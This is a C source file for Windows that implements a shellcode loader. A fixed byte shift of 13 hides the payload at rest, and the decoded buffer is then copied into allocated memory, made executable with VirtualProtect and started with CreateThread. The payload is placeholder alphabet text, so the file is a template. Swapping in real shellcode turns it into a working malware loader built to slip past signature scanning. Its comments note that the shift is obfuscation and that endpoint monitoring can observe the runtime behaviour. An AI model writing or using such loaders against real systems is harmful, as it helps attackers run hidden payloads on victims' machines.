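Adding a constant integer to the ASCII value of each character in the shellcode, and subtracting it again to decode, is a Caesar cipher. Because the offset is a fixed constant with no key, this is reversible encoding rather than encryption: it changes how the bytes look in the file, not what the program does once they are decoded in memory.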
#include<stdio.h>
#include<windows.h>
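/*
 * Encode a buffer in place by adding 13 to every byte.
 *
 * Despite the name this is not ROT13 (which rotates letters within the
 * alphabet only): every byte value is shifted, wrapping modulo 256. There is
 * no key, so the transform is obfuscation, not encryption; subtracting 13
 * from each byte restores the input.
 *
 * shellcode: buffer to transform in place; NULL is ignored.
 * len:       number of bytes to transform; values <= 0 leave the buffer untouched.
 */
void rot13_encrypt(char* shellcode, int len)
{
    if (shellcode == NULL) {
        return;
    }

    /* Work on unsigned bytes so the wrap past 255 is well defined instead of
     * depending on how the compiler narrows an out-of-range int to plain char. */
    unsigned char *bytes = (unsigned char *)shellcode;

    for (int i = 0; i < len; i++) {
        bytes[i] = (unsigned char)(bytes[i] + 13u);
    }
}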
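/*
 * Decode a buffer in place by subtracting 13 from every byte.
 *
 * This reverses an additive shift of 13 applied to each byte; values wrap
 * modulo 256. As with any fixed-offset shift there is no key: anyone who has
 * the encoded bytes can recover the original by trying at most 256 offsets.
 *
 * shellcode: buffer to transform in place; NULL is ignored.
 * len:       number of bytes to transform; values <= 0 leave the buffer untouched.
 */
void rot13_decrypt(char* shellcode, int len)
{
    if (shellcode == NULL) {
        return;
    }

    /* Unsigned arithmetic keeps the wrap below 0 well defined regardless of
     * whether plain char is signed on this compiler. */
    unsigned char *bytes = (unsigned char *)shellcode;

    for (int i = 0; i < len; i++) {
        bytes[i] = (unsigned char)(bytes[i] - 13u);
    }
}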
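/*
 * Demo driver: shifts a placeholder buffer by 13, prints it, shifts it back,
 * copies it into freshly allocated memory, marks that memory executable and
 * starts a thread at its address.
 *
 * The byte shift only changes how the buffer looks at rest. The decoded bytes
 * are back in process memory before the copy, and the sequence that follows
 * (read-write allocation, copy, VirtualProtect to PAGE_EXECUTE_READ,
 * CreateThread with a start address inside that allocation) is unchanged by
 * it; that runtime behaviour is what endpoint monitoring can observe.
 *
 * Returns 0 when the thread was created and waited on, 1 on any API failure.
 */
int main(void)
{
    /* Placeholder text, not machine code. Deliberately not const: the buffer
     * is transformed in place, and writing to a const object is undefined. */
    char shellcode[] = "abcdefghijklmnopqrstuvwxyz";
    int len = (int)sizeof shellcode;   /* includes the trailing NUL */
    int rc = 1;
    PVOID exec_mem;
    HANDLE th;
    DWORD oldprotect = 0;

    rot13_encrypt(shellcode, len);
    /* The terminator was shifted along with the data, so the buffer is no
     * longer a C string; bound the print explicitly instead of using %s alone. */
    printf("ROT 13 encrypted code: %.*s\n", len - 1, shellcode);

    exec_mem = VirtualAlloc(NULL, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (exec_mem == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return rc;
    }

    rot13_decrypt(shellcode, len);
    /* Decoding restores the NUL terminator, so %s is safe again here. */
    printf("ROT 13 decrypted code: %s\n", shellcode);

    RtlMoveMemory(exec_mem, shellcode, sizeof shellcode);

    /* The region was writable while being filled and only now becomes
     * executable; it is never writable and executable at the same time. */
    if (!VirtualProtect(exec_mem, sizeof shellcode, PAGE_EXECUTE_READ, &oldprotect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }

    th = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
    if (th == NULL) {
        fprintf(stderr, "CreateThread failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }

    WaitForSingleObject(th, INFINITE);
    CloseHandle(th);
    rc = 0;

out:
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return rc;
}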